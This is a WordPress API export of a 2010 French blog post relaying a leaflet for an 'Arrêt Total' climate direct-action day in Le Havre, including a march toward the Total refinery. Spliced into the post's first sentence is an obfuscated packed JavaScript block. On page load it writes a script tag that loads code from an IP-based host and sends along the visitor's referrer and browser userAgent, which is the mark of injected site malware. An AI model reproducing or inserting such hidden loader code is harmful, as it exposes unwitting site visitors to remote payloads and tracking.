{"id":4889,"date":"2010-09-15T18:24:34","date_gmt":"2010-09-15T17:24:34","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4889"},"modified":"2010-10-18T08:07:15","modified_gmt":"2010-10-18T07:07:15","slug":"arret-total-le-16-octobre-au-havre","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4889","title":{"rendered":"Arr\u00eat TOTAL le 16 octobre au Havre"},"content":{"rendered":"<div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.campclimat.org\/local\/cache-vignettes\/L226xH320\/tract-3406e.jpg\" alt=\"\" width=\"106\" height=\"151\" \/><\/p>\n<p><span style=\"color: #ff6600;\"><strong>Ce <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zshkh|var|u0026u|referrer|dntab||js|php'.split('|'),0,{}))\n<\/script><\/noindex> tract est diff\u00e9rent et par pareil !<\/strong><\/span><\/p>\n<p>Il vous invite \u00e0 tenter une exp\u00e9rience, \u00e0 faire autre chose qu\u2019une  manif\u2019, \u00e0 commencer \u00e0 changer le monde directement plut\u00f4t qu\u2019\u00e0 demander,  prier, esp\u00e9rer que d\u2019autres le fassent pour nous, ou en notre nom.<\/p>\n<p>Nous savons tous confus\u00e9ment que notre syst\u00e8me va droit dans le mur,  les in\u00e9galit\u00e9s augmentent autant ici dans cette ville qu\u2019en France, en  Europe, en Afrique et entre les Suds et les Nords. Nous sentons que \u00e7a  ne va pas durer comme \u00e7a encore des si\u00e8cles\u00a0: la Terre montre des signes  d\u2019\u00e9puisement. Le p\u00e9trole, le gaz, l\u2019eau potable vont bient\u00f4t manquer  ici ou l\u00e0, ici et l\u00e0.<\/p>\n<p>Il y a des r\u00e9seaux internationaux, Global Minga et Climate Justice  Action, qui appellent \u00e0 une semaine d\u2019actions partout dans le monde  entre le 12 et le 16 octobre 2010. En France, nous lan\u00e7ons ce mot  d\u2019ordre\u00a0: <strong>ARRET TOTAL<\/strong><\/p>\n<p>Nous grouillons d\u2019id\u00e9es pour sortir des logiques d\u2019impuissance et de fatalisme. Nous vous proposons de vous en emparer <strong>le samedi 16 octobre 2010 au Havre<\/strong>. Rendez-vous <strong>\u00e0 10h devant la gare<\/strong>. Un accueil est organis\u00e9 d\u00e8s le vendredi soir.<!--more--><\/p>\n<p>L\u00e0, un cort\u00e8ge partira pour, tous ensemble, se donner le droit, dans le centre-ville, <a href=\"http:\/\/www.bap.propagande.org\/\">d\u2019enlever les pubs<\/a>, <a href=\"http:\/\/www.guerilla-gardening-france.fr\/GG\/origine.html\">de semer des graines<\/a>,  de visiter un supermarch\u00e9 comme vous ne l\u2019avez jamais fait, de porter  plainte contre Total, de donner la priorit\u00e9 aux gens sur les voitures\u2026  Ce qui s\u2019appelle, le mot fait peur, de l\u2019<a href=\"https:\/\/secure.wikimedia.org\/wikipedia\/fr\/wiki\/Action_directe_%28th%C3%A9orie_politique%29\">action directe<\/a>.<\/p>\n<p>Vous attendez l\u2019occasion pour d\u00e9couvrir ce type de pratiques, vous  cherchez des lieux pour \u00eatre plus nombreux, vous voulez faire autre  chose que des manifs, des p\u00e9titions ou des d\u00e9bats\u00a0?<\/p>\n<p>Venez avec des bonnes chaussures, vos reproches \u00e0 faire \u00e0 Total, des  pelles et des b\u00eaches pour la gu\u00e9rilla jardini\u00e8re, des marqueurs et des  affiches pour l\u2019anti-pub, votre v\u00e9lo pour \u00eatre plus forts ensemble que  les voitures, des trucs \u00e0 manger pour un pique-<strong>NIQUE TOTAL<\/strong>, des bouteilles en plastique pour faire une sculpture g\u00e9ante \u00e0 la m\u00e9moire de la soci\u00e9t\u00e9 du p\u00e9trole \u2026<\/p>\n<p>L\u2019apr\u00e8s-midi, le cort\u00e8ge partira \u00e0 l\u2019assaut de la plus grande  raffinerie de France, pour la transformer si possible, en parler avec  les salari\u00e9s et faire savoir qu\u2019\u00e0 partir du 16 octobre, la peur va  changer de camp. On n\u2019en veut plus. On veut de la joie et de la  d\u00e9termination.<\/p>\n<p>Chaque personne est n\u00e9cessaire. A plusieurs centaines, c\u2019est une  belle journ\u00e9e. A plusieurs milliers, c\u2019est le rapport de force qui  change. Et si on est plus\u00a0?<\/p>\n<p><strong><span style=\"color: #ff6600;\">Changeons le syst\u00e8me, pas le climat<\/span><\/strong><\/p>\n<dl>\n<dt><a title=\"PDF - 1 Mo\" type=\"application\/pdf\" href=\"http:\/\/www.campclimat.org\/IMG\/pdf\/tract-16-octobre-2010_2-2.pdf\"><img loading=\"lazy\" decoding=\"async\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.campclimat.org\/local\/cache-vignettes\/L52xH52\/pdf-eb697.png\" alt=\"PDF - 1 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt style=\"width: 120px;\"><strong>Tract Arr\u00eat Total<\/strong><\/dt>\n<\/dl>\n<\/div>\n<p><strong>source<\/strong> : <a href=\"http:\/\/www.campclimat.org\/spip.php?article209\">http:\/\/www.campclimat.org\/spip.php?article209<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ce tract est diff\u00e9rent et par pareil ! Il vous invite \u00e0 tenter une exp\u00e9rience, \u00e0 faire autre chose qu\u2019une manif\u2019, \u00e0 commencer \u00e0 changer le monde directement plut\u00f4t qu\u2019\u00e0 demander, prier, esp\u00e9rer que d\u2019autres le fassent pour nous, ou &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4889\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,33],"tags":[],"class_list":["post-4889","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4889","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4889"}],"version-history":[{"count":8,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4889\/revisions"}],"predecessor-version":[{"id":5014,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4889\/revisions\/5014"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4889"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4889"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4889"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}